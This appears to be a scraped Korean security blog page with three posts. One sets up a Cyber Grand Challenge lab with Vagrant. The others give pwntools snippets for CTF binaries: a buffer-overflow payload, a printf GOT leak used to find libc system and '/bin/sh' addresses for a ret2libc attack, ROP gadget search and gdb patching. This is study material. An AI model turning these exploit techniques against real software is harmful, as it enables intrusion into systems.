반응형


  • vagrant는 VM 이미지를 관리하는 제품입니다.
    • https://www.vagrantup.com/
  • Virtual Box
    • https://www.virtualbox.org/
  • CGC 환경 설정 파일
    • https://s3.amazonaws.com/cgcdist/boxes/Vagrantfile
  • CGC 설명
    • https://github.com/CyberGrandChallenge/cgc-release-documentation/blob/master/walk-throughs/virtual-competiton.md



1. vagrant 명령어를 활용하여, 가상 머신을 다운 받는다.


CGC 환경 설정 파일을 vagrant 폴더에 복사 합니다.


2016-08-02  오후 02:28    <DIR>          .
2016-08-02  오후 02:28    <DIR>          ..
2016-08-02  오후 02:28    <DIR>          .vagrant
2015-12-21  오후 10:33         2,526,208 vagrant.exe
2016-08-02  오후 12:14             2,573 Vagrantfile

C:\HashiCorp\Vagrant\bin>vagrant.exe up
Bringing machine 'cb' up with 'virtualbox' provider...
Bringing machine 'ids' up with 'virtualbox' provider...
Bringing machine 'pov' up with 'virtualbox' provider...
Bringing machine 'crs' up with 'virtualbox' provider...
Bringing machine 'ti' up with 'virtualbox' provider...
==> cb: Checking if box 'cgc-linux-dev' is up to date...
==> cb: Clearing any previously set forwarded ports...
==> cb: Clearing any previously set network interfaces...
==> cb: Preparing network interfaces based on configuration...
    cb: Adapter 1: nat
    cb: Adapter 2: hostonly
==> cb: Forwarding ports...
    cb: 22 (guest) => 2222 (host) (adapter 1)
==> cb: Running 'pre-boot' VM customizations...
==> cb: Booting VM...
==> cb: Waiting for machine to boot. This may take a few minutes...
    cb: SSH address: 127.0.0.1:2222
    cb: SSH username: vagrant
    cb: SSH auth method: private key

............

C:\HashiCorp\Vagrant\bin>vagrant.exe status
Current machine states:

cb                        running (virtualbox)
ids                       running (virtualbox)
pov                       running (virtualbox)
crs                       running (virtualbox)
ti                        running (virtualbox)

This environment represents multiple VMs. The VMs are all listed
above with their current state. For more information about a specific
VM, run `vagrant status NAME`.

.....................

C:\HashiCorp\Vagrant\bin>vagrant.exe ssh crs
`ssh` executable not found in any directories in the %PATH% variable. Is an
SSH client installed? Try installing Cygwin, MinGW or Git, all of which
contain an SSH client. Or use your favorite SSH client with the following
authentication information shown below:

Host: 127.0.0.1
Port: 2202
Username: vagrant
Private key: C:/Users/JP20614/.vagrant.d/insecure_private_key

2. putty client 사용하기 위해서는 puttygen.exe를 통하여 개인키를 생성해야 한다.


3. putty client 설정 내용

  - ID : vagrant

  - IP : 127.0.0.1

  - Port : 2202


4. CGC 서버 설명

  • ti - this is the Team Interface. The role represents the interface that will be provided to a CRS by the CFE infrastructure.
  • cb - this is the Challenge Binary server. This is the host where CBs are executed.
  • pov - this is the POV server. This role has the responsibility of 'throwing' POVs (and polls) at the cb server.
  • crs - this is a host for simulating a CRS. While no, simulated CRS capabilities are distributed as part of Virtual Competition, a sample client is provided to exercise the Team Interface.
  • ids - this is the IDS host; the network appliance. Filters fielded by a CRS will be installed on ids. From a network perspective, ids is in between pov and cb.




반응형
저작자표시 비영리 변경금지 (새창열림)

'Reverse > pwnable' 카테고리의 다른 글

[CGC] SecuInside 2016(CGC/cykor_00002)  (0) 2016.08.02
[CGC] 공격 예제 코드 작성 - SecuInside 2016(CGC/cykor_00001)  (0) 2016.08.02
[pwntools] test code  (0) 2016.07.27
[pwntools] 함수 offset 계산 방법  (0) 2016.07.21
[defcon 24 - 2016] Reversing - baby-re  (0) 2016.05.24
반응형

[ pwn 예제 코드 ]

 

from pwn import *


#r = process('./pwn1')
r = remote('127.0.0.1', 1234)

payload = '-1'
payload += 'a'* 44
payload += '\xcd\x84\x04\x08'
payload += '\n'

print '[*] payload\n%s' % hexdump(payload)

r.sendline(payload)
print r.recv()

#r.interactive()

 

[ XML 파일 전송 ]


from pwn import *


r = remote('127.0.0.1', 1234)

payload = open('crattack.xml', 'rb').read()


print r.recvuntil( 'XML)' )

r.sendline(payload)


r.interactive()



 

[ 사용하는 라이브러리 확인 ]

 

babyhack@ubuntu:~/tmp/sctf2016/pwn2$ readelf -r ./pwn2

Relocation section '.rel.dyn' at offset 0x2fc contains 2 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
08049ffc  00000306 R_386_GLOB_DAT    00000000   __gmon_start__
0804a040  00000705 R_386_COPY        0804a040   stdout

Relocation section '.rel.plt' at offset 0x30c contains 6 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804a00c  00000107 R_386_JUMP_SLOT   00000000   printf
0804a010  00000207 R_386_JUMP_SLOT   00000000   getchar
0804a014  00000307 R_386_JUMP_SLOT   00000000   __gmon_start__
0804a018  00000407 R_386_JUMP_SLOT   00000000   __libc_start_main
0804a01c  00000507 R_386_JUMP_SLOT   00000000   setvbuf
0804a020  00000607 R_386_JUMP_SLOT   00000000   atoi
babyhack@ubuntu:~/tmp/sctf2016/pwn2$  

 

 

[ offset 찾는 방법 ]

 

# babyhack@ubuntu:~/tmp/sctf2016/pwn2$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep 'system' | more
#   244: 00115db0    68 FUNC    GLOBAL DEFAULT   12 svcerr_systemerr@@GLIBC_2.0
#   621: 0003b160    56 FUNC    GLOBAL DEFAULT   12 __libc_system@@GLIBC_PRIVATE
#  1445: 0003b160    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0

# babyhack@ubuntu:~/tmp/sctf2016/pwn2$ strings -a -tx /lib/i386-linux-gnu/libc.so.6 | grep '/bin/sh'
# 15f5db /bin/sh


# babyhack@ubuntu:~/tmp/sctf2016/pwn2$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep 'printf' | more
#.............................
#   641: 0004a130    45 FUNC    GLOBAL DEFAULT   12 printf@@GLIBC_2.0
#.............................

offset_printf = 0x4A130
offset_system = 0x3B160
offset_binsh = 0x15F5DB

#------------ printf_got leak -------#
#    +----------------------------+

#    |       aaaaaa.....aaaa          |

#    +----------------------------+

#    |            printf_plt           |

#    +----------------------------+

#    |             vuln()               |

#    +----------------------------+

#    |            '%s'                  |

#    +----------------------------+

#    |           print_got            |

#    +----------------------------+

 

payload += printf_plt
payload += vuln
payload += string_format
payload += printf_got

 

print '[*] payload\n%s\n' % hexdump(payload)

s.sendline(payload)

print '[*] first recv\n%s\n' % s.recvline()
print '[*] second recv\n%s\n' % s.recvline()

printf_got_leak = s.recvline()
print '[*] printf got\n%s\n' % hexdump(printf_got_leak)

libc_printf_got = hex(u32(printf_got_leak[:4]))

print '[*] lib_printf_got : ', libc_printf_got
 

libc_addr = int(libc_printf_got, 16) - offset_printf
system_addr = libc_addr + offset_system
binsh_addr = libc_addr + offset_binsh

print '[*] libc addr : ', hex(libc_addr)
print '[*] system addr : ', hex(system_addr)
print '[*] /bin/sh addr : ', hex(binsh_addr)

 

[ gadget 찾기 ]

 

https://github.com/0vercl0k/rp

 

#./rp++ -f ./pwn2 -r 4 | grep 'pop'
# 0x0804864e: pop edi ; pop ebp ; ret  ;  (1 found)
ppr = p32(0x0804864E) # 2 argument so, pop pop ret 

 

[ gdb code patch ]

 

(gdb) set *(unsigned char*)0x400cc3 = 0x90
(gdb) set *(unsigned char*)0x400cc4 = 0x90
(gdb) set *(unsigned char*)0x400ccd = 0x90
(gdb) set *(unsigned char*)0x400cce = 0x90
(gdb) set *(unsigned char*)0x400cd7 = 0x90
(gdb) set *(unsigned char*)0x400cd8 = 0x90
(gdb) disas main 

 

 

 

 

반응형
저작자표시 비영리 변경금지 (새창열림)

'Reverse > pwnable' 카테고리의 다른 글

[CGC] 공격 예제 코드 작성 - SecuInside 2016(CGC/cykor_00001)  (0) 2016.08.02
[vagrant] CGC (Cyber Grand Challenge) 환경 구축  (0) 2016.08.02
[pwntools] 함수 offset 계산 방법  (0) 2016.07.21
[defcon 24 - 2016] Reversing - baby-re  (0) 2016.05.24
[defcon 23 - 2015] r0pbaby Writeup  (0) 2016.05.18
반응형

 

[테스트 코드]

 

from pwn import *


elf = ELF('./a.out')
#rop = ROP(elf)
libc = ELF("/lib/i386-linux-gnu/libc.so.6")

printf_system_offset = libc.symbols['printf'] - libc.symbols['system']

 

printf_plt = elf.plt['printf']
printf_got = elf.got['printf']

write_plt = elf.plt['write']
write_got = elf.got['write']

 

libc_start_main = elf.plt['__libc_start_main']

 

print '[*] printf@plt : %s' % str(hex(printf_plt))
print '[*] printf@got : %s' % str(hex(printf_got))
print '[*] write@plt : %s' % str(hex(write_plt))
print '[*] write@got : %s' % str(hex(write_got))
print '[*] printf - system : %s(%s)' % (str(hex(printf_system_offset)), str(int(printf_system_offset)))

print '[*] lib_strat_main : %s' % str(hex(libc_start_main))

 

[실행 결과]

 

[*] printf@plt : 0x8048500
[*] printf@got : 0x804c010
[*] write@plt : 0x8048590
[*] write@got : 0x804c034
[*] printf - system : 0xefd0(61392)
[*] lib_strat_main : 0x8048580

 


 

반응형
저작자표시 비영리 변경금지 (새창열림)

'Reverse > pwnable' 카테고리의 다른 글

[vagrant] CGC (Cyber Grand Challenge) 환경 구축  (0) 2016.08.02
[pwntools] test code  (0) 2016.07.27
[defcon 24 - 2016] Reversing - baby-re  (0) 2016.05.24
[defcon 23 - 2015] r0pbaby Writeup  (0) 2016.05.18
[pcf2013] ropasaurusrex  (0) 2016.05.11

+ Recent posts

티스토리툴바